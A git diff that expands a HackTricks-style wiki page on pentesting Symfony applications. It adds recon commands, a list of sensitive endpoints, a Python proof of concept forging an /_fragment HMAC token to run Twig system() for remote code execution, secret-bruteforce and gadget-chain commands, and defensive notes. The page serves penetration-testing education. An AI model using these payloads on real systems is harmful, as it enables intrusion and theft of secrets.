Merge pull request #1170 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_symphony_20250722_082840

carlospolop · web-flow · commit c30ad29976cc · 2025-07-23T12:01:49.000+02:00
Research Update Enhanced src/network-services-pentesting/pen...
diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md
@@ -2,13 +2,127 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Take a look to the following posts:
+Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components).  This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.
 
-- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
-- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
-- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
+> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**).  Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50).
 
-{{#include ../../banners/hacktricks-training.md}}
+---
+
+## Recon & Enumeration
+
+### Finger-printing
+* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
+* Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
+  ```bash
+  curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
+  ```
+* Public routes that only exist on Symfony:
+  * `/_profiler`   (Symfony **Profiler** & debug toolbar)
+  * `/_wdt/<token>` (“Web Debug Toolbar”)  
+  * `/_error/{code}.{_format}` (pretty error pages)  
+  * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
+* Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
+
+### Interesting files & endpoints
+| Path | Why it matters |
+|------|----------------|
+| `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
+| `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
+| `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
+| `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
+| `/_fragment` | Entry point used by ESI/HInclude.  Abuse possible once you know `APP_SECRET` |
+| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
+| `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |
+
+---
+
+## High-impact Vulnerabilities (2023-2025)
+
+### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
+* **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
+* Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
+  ```python
+  # PoC – requires the secret
+  import hmac, hashlib, requests, urllib.parse as u
+  secret = bytes.fromhex('deadbeef…')
+  payload = "{{['id']|filter('system')}}"   # RCE in Twig
+  query = {
+      'template': '@app/404.html.twig',
+      'filter': 'raw',
+      '_format': 'html',
+      '_locale': 'en',
+      'globals[cmd]': 'id'
+  }
+  qs = u.urlencode(query, doseq=True)
+  token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
+  r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
+  print(r.text)
+  ```
+* Excellent write-up & exploitation script: Ambionics blog (linked in References).
+
+### 2. Windows Process Hijack – CVE-2024-51736
+* The `Process` component searched the current working directory **before** `PATH` on Windows.  An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.
+* Patched in 5.4.50, 6.4.14, 7.1.7.
+
+### 3. Session-Fixation – CVE-2023-46733
+* Authentication guard reused an existing session ID after login.  If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.
+
+### 4. Twig sandbox XSS – CVE-2023-46734
+* In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.
+
+### 5. Symfony 1 gadget chains (still found in legacy apps)
+* `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`.  Check file-upload endpoints and `phar://` wrappers.
 
+{{#ref}}
+../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
+{{#endref}}
 
+---
 
+## Exploitation Cheat-Sheet
+
+### Calculate HMAC token for `/_fragment`
+```bash
+python - <<'PY'
+import sys, hmac, hashlib, urllib.parse as u
+secret = bytes.fromhex(sys.argv[1])
+qs     = u.quote_plus(sys.argv[2], safe='=&')
+print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
+PY deadbeef… "template=@App/evil&filter=raw&_format=html"
+```
+
+### Bruteforce weak `APP_SECRET`
+```bash
+cewl -d3 https://target -w words.txt
+symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
+```
+
+### RCE via exposed Symfony Console
+If `bin/console` is reachable through `php-fpm` or direct CLI upload:
+```bash
+php bin/console about        # confirm it works
+php bin/console cache:clear --no-warmup
+```
+Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.
+
+---
+
+## Defensive notes
+1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
+2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
+3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level.
+4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth.
+
+---
+
+### Useful offensive tooling
+* **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery.
+* **phpggc** – Ready-made gadget chains for Symfony 1 & 2.
+* **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation).
+
+
+
+## References
+* [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
+* [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
+{{#include ../../banners/hacktricks-training.md}}
